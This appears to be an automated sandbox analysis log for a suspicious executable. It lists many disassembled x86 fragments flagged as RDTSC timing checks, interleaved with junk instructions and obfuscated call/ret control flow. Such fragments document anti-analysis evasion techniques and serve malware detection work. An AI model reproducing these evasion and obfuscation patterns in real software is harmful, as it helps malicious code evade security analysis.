                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64F1A second address: B64FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FB9B11D9848h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D3707h], edi 0x00000027 push 00000003h 0x00000029 mov esi, dword ptr [ebp+122D3A0Dh] 0x0000002f push 00000000h 0x00000031 movsx edx, di 0x00000034 push 00000003h 0x00000036 jl 00007FB9B11D984Ch 0x0000003c or edx, 60CFB078h 0x00000042 call 00007FB9B11D9849h 0x00000047 jmp 00007FB9B11D9859h 0x0000004c push eax 0x0000004d jl 00007FB9B11D9864h 0x00000053 mov eax, dword ptr [esp+04h] 0x00000057 push esi 0x00000058 pushad 0x00000059 push eax 0x0000005a pop eax 0x0000005b jmp 00007FB9B11D984Dh 0x00000060 popad 0x00000061 pop esi 0x00000062 mov eax, dword ptr [eax] 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 jng 00007FB9B11D9846h 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64FD1 second address: B64FD7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6506E second address: B6509F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FB9B11D9856h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB9B11D9852h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6509F second address: B650A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B650A5 second address: B6513B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FB9B11D9848h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 stc 0x00000024 push 00000000h 0x00000026 and edi, dword ptr [ebp+122D3921h] 0x0000002c push 7F165F1Eh 0x00000031 push ebx 0x00000032 jnp 00007FB9B11D9850h 0x00000038 jmp 00007FB9B11D984Ah 0x0000003d pop ebx 0x0000003e xor dword ptr [esp], 7F165F9Eh 0x00000045 push 00000003h 0x00000047 call 00007FB9B11D9856h 0x0000004c adc edi, 087D88A0h 0x00000052 pop ecx 0x00000053 push 00000000h 0x00000055 mov dl, ch 0x00000057 push 00000003h 0x00000059 sub dword ptr [ebp+122D2D71h], eax 0x0000005f push 6B44F6DCh 0x00000064 push ecx 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FB9B11D9852h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6520A second address: B6529C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB9B1005718h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f add dword ptr [ebp+122D2A45h], eax 0x00000015 push 00000000h 0x00000017 mov cl, A5h 0x00000019 mov di, 8C26h 0x0000001d push 07F127DAh 0x00000022 push ebx 0x00000023 pushad 0x00000024 push edi 0x00000025 pop edi 0x00000026 jmp 00007FB9B1005722h 0x0000002b popad 0x0000002c pop ebx 0x0000002d xor dword ptr [esp], 07F1275Ah 0x00000034 jno 00007FB9B100571Ah 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FB9B1005718h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Bh 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 push 00000000h 0x00000058 movzx edx, ax 0x0000005b push 00000003h 0x0000005d pushad 0x0000005e popad 0x0000005f push 801A6483h 0x00000064 push ebx 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FB9B1005721h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6529C second address: B652F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D9855h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a xor dword ptr [esp], 401A6483h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FB9B11D9848h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov edi, 27B64F93h 0x00000030 lea ebx, dword ptr [ebp+12446D08h] 0x00000036 movzx esi, di 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d jne 00007FB9B11D9846h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B652F9 second address: B652FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86EC4 second address: B86EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86EC9 second address: B86EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB9B1005716h 0x0000000a jmp 00007FB9B100571Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A07F second address: B5A08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A08B second address: B5A095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84D6E second address: B84D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84D74 second address: B84D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84D78 second address: B84D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8504F second address: B8505B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8505B second address: B8505F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B854A4 second address: B854BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B1005726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85636 second address: B85649 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB9B11D9846h 0x00000008 jl 00007FB9B11D9846h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85A73 second address: B85A87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB9B100571Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85A87 second address: B85A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB9B11D9846h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85A99 second address: B85AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85AA0 second address: B85ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB9B11D9858h 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85EB1 second address: B85EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85EB5 second address: B85EBF instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85EBF second address: B85EF7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB9B1005724h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c jmp 00007FB9B100571Dh 0x00000011 jmp 00007FB9B100571Dh 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85EF7 second address: B85F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7D9C8 second address: B7D9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B1005729h 0x00000009 jng 00007FB9B1005716h 0x0000000f popad 0x00000010 jmp 00007FB9B100571Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7D9FB second address: B7DA01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86049 second address: B8604F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8604F second address: B86062 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007FB9B11D9846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86062 second address: B86068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86068 second address: B8606E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B58641 second address: B58645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8FFB9 second address: B8FFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90115 second address: B9011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9011A second address: B9015C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D984Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FB9B11D9853h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB9B11D9858h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90334 second address: B90346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9B100571Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90346 second address: B9034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B500BC second address: B500EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B1005720h 0x00000007 jg 00007FB9B1005716h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FB9B1005729h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B93C8A second address: B93C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB9B11D984Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B93C9A second address: B93CA4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B943B8 second address: B943BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B943BF second address: B943FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB9B1005728h 0x00000008 jmp 00007FB9B1005726h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FB9B1005716h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95607 second address: B9562D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FB9B11D984Ah 0x00000012 pushad 0x00000013 jmp 00007FB9B11D984Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9598D second address: B9599E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FB9B1005716h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95F5C second address: B95F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95FBD second address: B95FF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FB9B1005716h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebx 0x00000011 pushad 0x00000012 jmp 00007FB9B1005720h 0x00000017 adc dl, FFFFFF90h 0x0000001a popad 0x0000001b nop 0x0000001c pushad 0x0000001d jl 00007FB9B100571Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95FF5 second address: B95FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95FF9 second address: B9600A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9B1005716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9600A second address: B9600E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B960D9 second address: B960DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B963F1 second address: B9641D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jc 00007FB9B11D9866h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB9B11D9858h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9655A second address: B96560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B965C4 second address: B965EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB9B11D984Fh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB9B11D9852h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B965EE second address: B965F8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB9B100571Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B965F8 second address: B96631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FB9B11D9848h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 and edi, dword ptr [ebp+122D3A55h] 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FB9B11D984Ah 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B96631 second address: B96653 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B100571Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB9B100571Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97500 second address: B97507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97507 second address: B9752A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB9B1005727h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9752A second address: B97534 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97534 second address: B97539 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A5A2 second address: B9A5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A34A second address: B9A34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B0B1 second address: B9B0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B0B6 second address: B9B108 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB9B100571Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sub esi, dword ptr [ebp+122D39C5h] 0x00000013 push 00000000h 0x00000015 xor esi, 265968B8h 0x0000001b adc si, CB12h 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007FB9B1005718h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B108 second address: B9B10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1213 second address: BA1222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B100571Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C482 second address: B9C486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C486 second address: B9C48C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C48C second address: B9C490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C490 second address: B9C49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C49E second address: B9C4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA31AD second address: BA31B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA31B7 second address: BA31C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3375 second address: BA337B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA452B second address: BA452F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA337B second address: BA337F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA452F second address: BA4535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA4535 second address: BA453B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA453B second address: BA4551 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jo 00007FB9B11D984Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8565 second address: BA856F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB9B1005716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BADA6F second address: BADA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BADA73 second address: BADA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BADA77 second address: BADA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA52D second address: BAA532 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
